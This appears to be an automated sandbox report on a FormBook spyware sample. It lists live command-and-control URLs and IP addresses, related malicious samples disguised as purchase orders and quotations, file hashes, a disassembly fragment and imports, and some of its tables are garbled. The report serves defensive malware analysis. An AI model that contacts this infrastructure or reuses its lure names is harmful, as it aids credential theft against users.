                                                                http://www.suarahati20.xyz/4est/true
                                                                  unknown
                                                                  http://www.1183377.app/8z5k/true
                                                                    unknown
                                                                    http://www.broomeorchard.xyz/8o1o/true
                                                                      unknown
                                                                      http://www.suarahati20.xyz/4est/?gP=6TioOITzTznuWaHCUWnl//RNTiJIkSIqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXlY89F3XW39p23v05UDH3lWqOp67DGsRlWdM=&-L=kBMxZFRpAD6Ptrue
                                                                        unknown
                                                                        http://www.asociacia.online/jsqu/?-L=kBMxZFRpAD6P&gP=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuAECuXdbdVwd/lx4BGGAWHgBLP9AhssTD5eI=true
                                                                          unknown
                                                                          http://www.broomeorchard.xyz/8o1o/?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU=true
                                                                            unknown
                                                                            http://www.nmh6.site/8qne/?-L=kBMxZFRpAD6P&gP=KTDLAip6979182YpgYgwlP0twqrvN2KjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdczwn6nM8FHB3uPZpUzCEofVeYgOE3F6jmTm8=true
                                                                              unknown
                                                                              http://www.52ywq.vip/4i87/true
                                                                                unknown
                                                                                http://www.52ywq.vip/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8=true
                                                                                  unknown
                                                                                  http://www.o731lh.vip/xweg/true
                                                                                    unknown
                                                                                    http://www.asociacia.online/jsqu/true
                                                                                      unknown
                                                                                      http://www.consultarfacil.online/2ho9/true
                                                                                        unknown
                                                                                        http://www.tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6Ptrue
                                                                                          unknown
                                                                                          http://www.93187.xyz/jyeu/true
                                                                                            unknown
                                                                                            http://www.zenscape.top/d8cw/true
                                                                                              unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs | write.exe, 0000000B.00000002.3747327536.0000000005C22000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.00000000039E2000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nmh6.site | UCAmCgWJyh.exe, 0000000D.00000002.3748863633.0000000004F8E000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://login.live.c | write.exe, 0000000B.00000002.3743884868.0000000002B65000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://6329.vhjhbv.com/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UC | write.exe, 0000000B.00000002.3747327536.0000000005448000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000003208000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
103.21.221.4 | tempatmudisini01.click | unknown | 9905 | LINKNET-ID-APLinknetASNID | true
199.192.21.169 | www.zenscape.top | United States | 22612 | NAMECHEAP-NETUS | true
107.163.130.249 | www.93187.xyz | United States | 20248 | TAKE2US | true
198.252.106.191 | suarahati20.xyz | Canada | 20068 | HAWKHOSTCA | true
20.184.53.162 | xzwp.g.zxy-cname.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
43.154.104.247 | www.nmh6.site | Japan | 4249 | LILLY-ASUS | true
23.224.37.76 | hse6978h2.g.asiagoogleantiddoscdn.com | United States | 40065 | CNSERVERSUS | true
81.2.196.19 | asociacia.online | Czech Republic | 24806 | INTERNET-CZKtis238403KtisCZ | true
3.33.130.190 | o731lh.vip | United States | 8987 | AMAZONEXPANSIONGB | true
15.197.204.56 | www.broomeorchard.xyz | United States | 7430 | TANDEMUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529061
Start date and time: 2024-10-08 15:53:02 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Z6s208B9QX.exe (renamed because the original name is a hash value)
Original Sample Name: e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@13/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 51
• Number of non-executed functions: 302
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information
• Report size exceeded the maximum capacity and may have missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Z6s208B9QX.exe
Time | Type | Description
09:55:17 | API Interceptor | 9318139x Sleep call for process: write.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
103.21.221.4
• -pdf.bat.exe | malicious | FormBook | www.tempatmudisini01.click/iydt/
• UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | www.tempatmudisini01.click/iydt/
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | www.tempatmudisini01.click/abla/
• Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | www.tempatmudisini01.click/phdl/
• ncOLm62YLB.exe | malicious | FormBook | www.tempatmudisini01.click/lybf/
• SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook | www.tempatmudisini01.click/r9rj/
• SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | malicious | FormBook | www.tempatmudisini01.click/abla/
199.192.21.169
• 8mmZ7Bkoj1.exe | malicious | FormBook | www.cenfresh.life/6iok/
• PURCHASE ORDER.exe | malicious | FormBook | www.selftip.top/85su/
• update SOA.exe | malicious | FormBook | www.technectar.top/ghvt/
• NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | www.selftip.top/85su/
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | www.zenscape.top/d8cw/
• Request for Quotation Hi-Tech Park Project 193200.exe | malicious | FormBook | www.zenscape.top/d8cw/
• DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | www.selftip.top/85su/
• DCP11-83642024..exe | malicious | FormBook | www.urbanpulse.help/r50h/
• PROFOMA INVOICE SHEET.exe | malicious | FormBook | www.selftip.top/85su/
• SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | malicious | FormBook | www.zenscape.top/d8cw/
107.163.130.249
• PO For Bulk Order.exe | malicious | FormBook | www.93187.xyz/jd6t/
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | www.93187.xyz/jyeu/
• SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | malicious | FormBook | www.93187.xyz/jyeu/
• New Purchase Order.exe | malicious | FormBook | www.93187.xyz/jd6t/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.zenscape.top
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 199.192.21.169
• Request for Quotation Hi-Tech Park Project 193200.exe | malicious | FormBook | 199.192.21.169
• SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | malicious | FormBook | 199.192.21.169
hse6978h2.g.asiagoogleantiddoscdn.com
• DHL_ 46773482.exe | malicious | FormBook | 156.251.233.85
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 23.224.27.173
www.broomeorchard.xyz
• N2Qncau2rN.exe | malicious | FormBook | 15.197.204.56
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 15.197.204.56
www.nmh6.site
• Shipping Documents_pdf.exe | malicious | FormBook | 43.154.104.247
• shipping notification_pdf.exe | malicious | FormBook | 43.154.104.247
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 43.154.104.247
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TAKE2US
• na.elf | malicious | Mirai | 107.163.175.138
• PO For Bulk Order.exe | malicious | FormBook | 107.163.130.249
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 107.163.130.249
• SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | malicious | FormBook | 107.163.130.249
• New Purchase Order.exe | malicious | FormBook | 107.163.130.249
• Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs | malicious | FormBook, GuLoader | 23.231.158.3
• quotation.exe | malicious | DarkTortilla, FormBook | 23.231.158.3
• #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | malicious | FormBook, GuLoader | 23.231.158.3
• Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 23.231.158.3
• Contract.exe | malicious | FormBook | 23.231.158.3
LINKNET-ID-APLinknetASNID
• na.elf | malicious | Unknown | 139.41.97.67
• na.elf | malicious | Unknown | 139.16.199.224
• na.elf | malicious | Mirai, Okiru | 139.34.248.222
• -pdf.bat.exe | malicious | FormBook | 103.21.221.4
• P030092024LANDWAY.exe | malicious | FormBook | 103.21.221.87
• UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 103.21.221.4
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 103.21.221.4
• Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | 103.21.221.4
• jNGMZWmt23.elf | malicious | Mirai | 139.37.141.74
• ncOLm62YLB.exe | malicious | FormBook | 103.21.221.4
HAWKHOSTCA
• PURCHASE ORDER-6350.exe | malicious | FormBook | 198.252.106.191
• PO23100072.exe | malicious | FormBook | 198.252.106.191
• RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | 198.252.106.191
• PO-000001488.exe | malicious | FormBook | 198.252.106.191
• BL Draft-Invoice-Packing list-Shipping Document.pif.exe | malicious | FormBook | 198.252.106.136
• PURCHASE ORDER-6350.exe | malicious | FormBook | 198.252.106.191
• file No83293 PO & Specification.gz.exe | malicious | FormBook | 198.252.106.241
• vm6XYZzWOd.exe | malicious | PureLog Stealer, SystemBC | 198.252.105.116
• 1AIemYSAZy.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc | 198.252.102.119
• ENEDGCErLu.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, SystemBC | 198.252.102.119
NAMECHEAP-NETUS
• 5FRWRDOqk7.exe | malicious | FormBook |
                                                                                                      • 162.0.236.169
                                                                                                      jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 63.250.47.40
                                                                                                      ItPTgiBC07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 198.54.122.135
                                                                                                      N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.192.19.19
                                                                                                      q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 198.54.122.135
                                                                                                      RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.238.43
                                                                                                      8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.192.21.169
                                                                                                      FDA.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 198.54.125.199
                                                                                                      PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 63.250.38.167
                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 162.255.117.53
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Windows\SysWOW64\write.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196608
                                                                                                      Entropy (8bit):1.1209935793793442
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                                                      MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                                                      SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                                                      SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                                                      SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Process:C:\Users\user\Desktop\Z6s208B9QX.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):287744
                                                                                                      Entropy (8bit):7.994641784324539
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:zcPFP4/VDsdhkdSKY4cEcuDtpTu/iK9fA1x1yNNrvO:zmpEDIkEJifKiEA1x8fvO
                                                                                                      MD5:7DF87E0D88FDAD1D7F0B9A1110E5FC0F
                                                                                                      SHA1:29E42B73F2E176FB36510C749575F1D5F9CF6699
                                                                                                      SHA-256:B985C5F45ED6FB054009502CFB913164A82981AE7A07B71CEDD194375E78B29D
                                                                                                      SHA-512:62FCAB5836138AB7A5D6D7E76704F054DEEF07865A38AC44ADFBACBE8EED5A4E0C55C3CB960D25400E7C29888D55B4AE0E39231E3AEAA120894F6D1845FEF823
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.5623073767022575
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:Z6s208B9QX.exe
                                                                                                      File size:1'403'415 bytes
                                                                                                      MD5:09bfd7f979770cde56456734d6d1ff8d
                                                                                                      SHA1:15a1450424a5bf0320b429d7aaa71dc724502d89
                                                                                                      SHA256:e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5
                                                                                                      SHA512:2f2f95cf6ef102c4538ce6633ce2f3c3bfbbc1eb4f41fdb3391eda436ad3742f7701ffcff0614c4d6162b9a92d9b9905aaf467998c0aaefe00dbcf579afdd7df
                                                                                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCtC7Jv9zuKi8GfE1JTCtsri/c26MRxuQoO:7JZoQrbTFZY1iaCtCtsKgE18ZcoxubO
                                                                                                      TLSH:2155F122B5C68076C2F323B19E7AF769963D79360327D1D723C82D365EA05812B39763
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                      Icon Hash:1733312925935517
                                                                                                      Entrypoint:0x4165c1
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                      Instruction
                                                                                                      call 00007F0D00CE31FBh
                                                                                                      jmp 00007F0D00CDA06Eh
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push edi
                                                                                                      push esi
                                                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                                                      mov ecx, dword ptr [ebp+10h]
                                                                                                      mov edi, dword ptr [ebp+08h]
                                                                                                      mov eax, ecx
                                                                                                      mov edx, ecx
                                                                                                      add eax, esi
                                                                                                      cmp edi, esi
                                                                                                      jbe 00007F0D00CDA1EAh
                                                                                                      cmp edi, eax
                                                                                                      jc 00007F0D00CDA386h
                                                                                                      cmp ecx, 00000080h
                                                                                                      jc 00007F0D00CDA1FEh
                                                                                                      cmp dword ptr [004A9724h], 00000000h
                                                                                                      je 00007F0D00CDA1F5h
                                                                                                      push edi
                                                                                                      push esi
                                                                                                      and edi, 0Fh
                                                                                                      and esi, 0Fh
                                                                                                      cmp edi, esi
                                                                                                      pop esi
                                                                                                      pop edi
                                                                                                      jne 00007F0D00CDA1E7h
                                                                                                      jmp 00007F0D00CDA5C2h
                                                                                                      test edi, 00000003h
                                                                                                      jne 00007F0D00CDA1F6h
                                                                                                      shr ecx, 02h
                                                                                                      and edx, 03h
                                                                                                      cmp ecx, 08h
                                                                                                      jc 00007F0D00CDA20Bh
                                                                                                      rep movsd
                                                                                                      jmp dword ptr [00416740h+edx*4]
                                                                                                      mov eax, edi
                                                                                                      mov edx, 00000003h
                                                                                                      sub ecx, 04h
                                                                                                      jc 00007F0D00CDA1EEh
                                                                                                      and eax, 03h
                                                                                                      add ecx, eax
                                                                                                      jmp dword ptr [00416654h+eax*4]
                                                                                                      jmp dword ptr [00416750h+ecx*4]
                                                                                                      nop
                                                                                                      jmp dword ptr [004166D4h+ecx*4]
                                                                                                      nop
                                                                                                      inc cx
                                                                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                      inc cx
                                                                                                      add byte ptr [ebx], ah
                                                                                                      ror dword ptr [edx-75F877FAh], 1
                                                                                                      inc esi
                                                                                                      add dword ptr [eax+468A0147h], ecx
                                                                                                      add al, cl
                                                                                                      jmp 00007F0D031529E7h
                                                                                                      add esi, 03h
                                                                                                      add edi, 03h
                                                                                                      cmp ecx, 08h
                                                                                                      jc 00007F0D00CDA1AEh
                                                                                                      rep movsd
                                                                                                      jmp dword ptr [00000000h+edx*4]
                                                                                                      Programming Language:
                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                      • [C++] VS2010 SP1 build 40219
                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                      • [ASM] VS2010 SP1 build 40219
                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                      • [LNK] VS2010 SP1 build 40219
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x8d41c         | 0x154        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xab000         | 0x9328       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x82000         | 0x844        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x8061c      | 0x80800  | 61ffce4768976fa0dd2a8f6a97b1417a | False    | 0.5583182605787937  | data      | 6.684690148171278  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000         | 0xdfc0       | 0xe000   | 0354bc5f2376b5e9a4a3ba38b682dff1 | False    | 0.36085728236607145 | data      | 4.799741132252136  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x90000         | 0x1a758      | 0x6800   | 8033f5a38941b4685bc2299e78f31221 | False    | 0.15324519230769232 | data      | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xab000         | 0x9328       | 0x9400   | 495451d7eb8326bd9fa2714869ea6de8 | False    | 0.49002322635135137 | data      | 5.541804843154628  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name          | RVA     | Size   | Type                                                                                   | Language | Country       | ZLIB Complexity
RT_ICON       | 0xab5c8 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors    | English  | Great Britain | 0.3277027027027027
RT_ICON       | 0xab6f0 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                         | English  | Great Britain | 0.7466216216216216
RT_ICON       | 0xab818 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                         | English  | Great Britain | 0.3885135135135135
RT_ICON       | 0xab940 | 0x668  | Device independent bitmap graphic, 48 x 96 x 4, image size 1152                        | English  | Great Britain | 0.48109756097560974
RT_ICON       | 0xabfa8 | 0x2e8  | Device independent bitmap graphic, 32 x 64 x 4, image size 512                         | English  | Great Britain | 0.5672043010752689
RT_ICON       | 0xac290 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128                         | English  | Great Britain | 0.6418918918918919
RT_ICON       | 0xac3b8 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors  | English  | Great Britain | 0.7044243070362474
RT_ICON       | 0xad260 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  | English  | Great Britain | 0.8077617328519856
RT_ICON       | 0xadb08 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors   | English  | Great Britain | 0.5903179190751445
RT_ICON       | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600                       | English  | Great Britain | 0.5503112033195021
RT_ICON       | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224                       | English  | Great Britain | 0.6050656660412758
RT_ICON       | 0xb16c0 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 1088                       | English  | Great Britain | 0.7553191489361702
RT_MENU       | 0xb1b28 | 0x50   | data                                                                                   | English  | Great Britain | 0.9
RT_DIALOG     | 0xb1b78 | 0xfc   | data                                                                                   | English  | Great Britain | 0.6507936507936508
RT_STRING     | 0xb1c78 | 0x530  | data                                                                                   | English  | Great Britain | 0.33960843373493976
RT_STRING     | 0xb21a8 | 0x690  | data                                                                                   | English  | Great Britain | 0.26964285714285713
RT_STRING     | 0xb2838 | 0x4d0  | data                                                                                   | English  | Great Britain | 0.36363636363636365
RT_STRING     | 0xb2d08 | 0x5fc  | data                                                                                   | English  | Great Britain | 0.3087467362924282
RT_STRING     | 0xb3308 | 0x65c  | data                                                                                   | English  | Great Britain | 0.34336609336609336
RT_STRING     | 0xb3968 | 0x388  | data                                                                                   | English  | Great Britain | 0.377212389380531
RT_STRING     | 0xb3cf0 | 0x158  | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                       | English  | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84   | data                                                                                   | English  | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14   | data                                                                                   | English  | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14   | data                                                                                   | English  | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14   | data                                                                                   | English  | Great Britain | 1.25
                                                                                                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
